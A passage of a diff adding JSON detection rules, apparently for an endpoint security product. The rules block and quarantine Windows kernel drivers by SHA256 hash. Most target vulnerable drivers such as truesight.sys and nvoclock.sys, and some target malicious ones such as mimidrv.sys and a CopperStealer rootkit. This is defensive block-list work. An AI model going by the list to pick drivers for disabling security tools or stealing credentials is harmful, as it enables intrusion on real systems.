+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622174Z",
+ "creation_date": "2026-03-23T11:45:29.622176Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622181Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e",
+ "comment": "BioStar Racing GT EVO vulnerable driver (aka BS_RCIO64.sys) [CVE-2021-44852] [https://nephosec.com/biostar-exploit/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "edf7f554-cb75-59f6-bdd5-b6fb7897d46f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836468Z",
+ "creation_date": "2026-03-23T11:45:30.836471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836476Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c77a23599f2eab14c330798defb9189fe1983a394cbee62dbcb725b365c9645b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ee16ce9a-f275-5daa-94e9-44b3648485dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829125Z",
+ "creation_date": "2026-03-23T11:45:31.829128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "304c18db58ffbdc11d35a5475a682c95ab932468cc84c31e98deaa0680fe7ea2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ee1b86ce-53fd-57a6-ab83-a7fdfa460f60",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483340Z",
+ "creation_date": "2026-03-23T11:45:31.483344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483353Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a33cbfa4c55625d74ced7b1b6c74433fd57882f65677ebe2010191dd8812f0b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ee1c2bab-e320-51e3-a245-96cbd130303e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978170Z",
+ "creation_date": "2026-03-23T11:45:29.978172Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978178Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "83ac9bf01c2d2ab0f66782fade462864f42b86e53dc455e1441c2a16d0ec2847",
+ "comment": "Malicious Kernel Driver (aka 0x3040_blacklotus_beta_driver.sys) [https://www.loldrivers.io/drivers/8750b245-af35-4bc6-9af3-dc858f9db64f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ee35292b-b6c0-5326-a863-c803f917f178",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154656Z",
+ "creation_date": "2026-03-23T11:45:31.154658Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154663Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a192d1cd870059a96661cb4ec05d5acdb0c7588aeacb390805237e55cf10f073",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ee4ac39b-c7ff-5b43-b199-284e93fff580",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160570Z",
+ "creation_date": "2026-03-23T11:45:31.160572Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160577Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4ca5d33aef0a2c435fdf1d4d7ee7726121c5b3857249255ab92861dafaf8b06",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ee4f24ab-fa60-5a37-8f94-4c0a3ab7ed84",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606139Z",
+ "creation_date": "2026-03-23T11:45:29.606141Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606146Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77950e2a40ac0447ae7ee1ee3ef1242ce22796a157074e6f04e345b1956e143c",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ee50abb9-7836-5c47-8f3f-7d75e5dd9bd0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820012Z",
+ "creation_date": "2026-03-23T11:45:30.820014Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820020Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "abbf92203a31c93b8e719cdabff1c681921edbaf43cd34da79c86cb5a806757f",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ee667ac4-91de-5cb7-8d10-14a9e7e9f9cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822522Z",
+ "creation_date": "2026-03-23T11:45:31.822526Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822534Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09f0ae64632dc0122b29d4708217d7a8332fef12d91bc8bae5c66ae6c9067385",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ee754b0d-36fd-5d32-b057-a77d8b1079c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469836Z",
+ "creation_date": "2026-03-23T11:45:30.469840Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469849Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58ed3bafe401102ddf52c9c2e006408ef181ceaf85741a73328d8fe92195edca",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ee961be6-32df-5df7-a822-784c26004ba7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820266Z",
+ "creation_date": "2026-03-23T11:45:30.820268Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820274Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3fc8f8dddbd471fa2d5deb292552876b3c737b09149307f901e38b53cd62648",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ee98abba-b4e4-501b-ac4f-9b16d36c4f92",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150599Z",
+ "creation_date": "2026-03-23T11:45:31.150601Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150606Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19a6d53a72915b456b800c699c38b30aaaa009939b9ea1e1fa229d57f1ca46db",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eead8ee9-b9bd-51d0-8674-4f54d5b5be3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479992Z",
+ "creation_date": "2026-03-23T11:45:30.479994Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479999Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ca20c63d8f56c09c48d0faa1894f2e3fccd4b029fd711d9864355e5f29c19f8",
+ "comment": "Vulnerable Kernel Driver (aka AsmIo64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eeb016a8-5e5e-5744-a789-c9a1a68f5318",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486801Z",
+ "creation_date": "2026-03-23T11:45:31.486804Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486813Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89a6952035427dfbb70e27e1456e8b13648f205609871924027f4dfc3ade37cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eeb71fcb-1aa6-5bf3-b1e9-0b20981ee673",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831748Z",
+ "creation_date": "2026-03-23T11:45:30.831750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831756Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a348c4ac61303db7a1dbab06c95e56abbcd947d394dce5e2316232ce58b22bd9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eeb994b3-e138-5e6a-aecc-8176cc25b143",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977514Z",
+ "creation_date": "2026-03-23T11:45:29.977516Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977521Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5fad3775feb8b6f6dcbd1642ae6b6a565ff7b64eadfc9bf9777918b51696ab36",
+ "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eec9b3ec-9b5b-560c-a8f6-05a9aa396028",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973059Z",
+ "creation_date": "2026-03-23T11:45:29.973061Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8eaa5e6d3230b93c126d2d58e32409e4aeeb23ccf0dd047a17f1ef552f92fe9",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eed73264-cbbb-5a19-8ef9-ecae7481d090",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981670Z",
+ "creation_date": "2026-03-23T11:45:29.981674Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981683Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13",
+ "comment": "Vulnerable Kernel Driver (aka netflt.sys) [https://www.loldrivers.io/drivers/35a9afeb-18f1-4c02-a3aa-830e300138ae/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eed909b5-6a82-53cd-a387-c62d67abc935",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488621Z",
+ "creation_date": "2026-03-23T11:45:31.488623Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488629Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7a95440a117482379be31db69537776dbc52c0128e89d9684aaa65e13190713",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eeee10ba-db56-5871-b08d-68b2b2cb4b96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977278Z",
+ "creation_date": "2026-03-23T11:45:29.977280Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977286Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37a1a3fa4dc148924c1bfb60c88ffef082ee58cd0ee804d2de0f1d22c1e7802c",
+ "comment": "Malicious CopperStealer Rootkit (aka windbg.sys) [https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eef8e40f-78f7-572e-85d2-eda0ac8e0695",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156655Z",
+ "creation_date": "2026-03-23T11:45:31.156657Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156662Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c6331505edd1014cc52161204024e2abca62b87158666db06c8524508402a7a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef0290d0-3329-566b-aeaa-61e94c4d0768",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
